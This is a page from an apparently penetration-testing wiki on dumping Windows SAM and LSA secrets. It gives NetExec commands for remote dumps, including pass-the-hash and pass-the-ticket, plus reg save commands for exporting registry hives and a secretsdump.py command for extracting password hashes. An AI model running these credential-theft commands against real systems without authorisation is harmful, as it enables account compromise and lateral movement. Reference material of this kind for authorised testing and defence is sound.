Pentest List Wiki
  • What is Pentest List Wiki?
  • OFFENSIVE SECURITY
    • External Infrastructure
      • Discovery
        • Email Address Discovery
        • Subdomain Discovery
        • Data Discovery
        • Port & Service Discovery
      • Exploitation
        • Password Spraying
        • Vulnerability Scanning
    • Internal Infrastructure
      • General Discovery
        • AD Attack Path Discovery
        • Port & Service Discovery
      • Credential Discovery
        • Passwords and NetNTLM
        • SAM & LSA secrets
        • NTDS.dit secrets
        • LSASS secrets
        • DCSync
        • DPAPI secrets
      • Movement
        • Credential Spraying
        • SMB Relaying
        • Pass The Hash
      • Infiltration/Exfiltration
        • Pivoting (Proxying)
    • Web Application
      • Discovery
        • Testing API Keys
        • Vulnerability Scan
        • Web Content Discovery
        • Parameter Discovery
        • VHOST Discovery
        • CMS Scanners
      • Exploitation
        • Authentication
          • Email Address Forms
          • AWS Cognito
        • JSON Web Tokens
        • Injection Attacks
          • SQL Injection
          • Cross-Site Scripting
          • HTTP Headers
      • Bypasses
        • Cloudflare Bypass
        • HTTP 403 Bypass
    • Mobile (iOS/Android)
      • iOS
        • IPA Decryption
        • Filesystem Analysis
        • Static Analysis
    • Cloud
      • AWS
        • Vulnerability Scanners
        • S3 Buckets
      • Azure
        • Vulnerability Scanners
        • m365 & Entra ID
  • DEFENSIVE SECURITY
    • Forged Kerberos Tickets
    • Logon Event Visualisation
Powered by GitBook
On this page
  • Overview
  • Remotely Dumping
  • Local Dumping
  • The Dump
  • Credential Extraction
  1. OFFENSIVE SECURITY
  2. Internal Infrastructure
  3. Credential Discovery

SAM & LSA secrets

How to find local user passwords, hashes and secrets.

PreviousPasswords and NetNTLMNextNTDS.dit secrets

Last updated 11 months ago

Overview

Windows passwords are hashed and stored in the SAM and SECURITY registry hives.

A breakdown of the important hives is shown below:

SAM

Stores locally cached credentials in LM or NT hash format.

SECURITY

Stores domain cached credentials (LSA secrets) in plaintext, LM or NT hash, kerberos keys (DES, AES), domain cached credentials (DCC1 and DCC2), as well as security questions (L$SQSA).

SYSTEM

This registry can be exported to aid decryption of the SAM secrets and LSA secrets.

Remotely Dumping

The SAM and LSA secrets can be dumped remotely by exporting the registry hives and then using a credential extraction tool. NetExec is a tool that will perform various remote network tasks, including dumping of the SAM and LSA secrets.

NetExec may be used to connect to a remote Windows host using various types of credentials. It should be noted that you are required to have local administrator privileges to do this:

Remote SAM/LSA secrets dump using domain user with local administrator privileges

netexec smb <Windows_IP> -d <domain> -u <user> -p <password> <--sam/--lsa>

Remote SAM/LSA secrets dump using local user with local administrator privileges

netexec smb <Windows_IP> --local-auth -u <user> -p <password> <--sam/--lsa>

Remote SAM/LSA secrets dump using pass-the-hash attack with local administrator user

netexec smb <Windows_IP> -d <domain> -u <user> -H <NT_hash> <--sam/--lsa>

Remote SAM/LSA secrets dump using pass-the-ticket attack with local administrator user

netexec smb <Windows_IP> --kerberos <--sam/--lsa>

Local Dumping

The Dump

The SAM and LSA secrets can be dumped locally by exporting the registry hives locally and then using an offline credential extraction tool. The easiest way to export the registry hives is to use a local cmd prompt with the following commands:

reg save HKLM\SAM "C:\Windows\Temp\sam"

reg save HKLM\SECURITY "C:\Windows\Temp\security"

reg save HKLM\SYSTEM "C:\Windows\Temp\system"

These files can then be exfiltrated out of the Windows machine and onto your attack machine.

Credential Extraction

secretsdump.py performs various techniques to dump password hashes and secrets.

The command below should be used on your attack machine and be fed the registry files that you exported using the dump technique above:

secretsdump.py -sam '<sam_hive>' -security '<security_hive>' -system '<system_hive>' LOCAL

https://github.com/Pennyw0rth/NetExec
https://github.com/fortra/impacket/blob/master/examples/secretsdump.py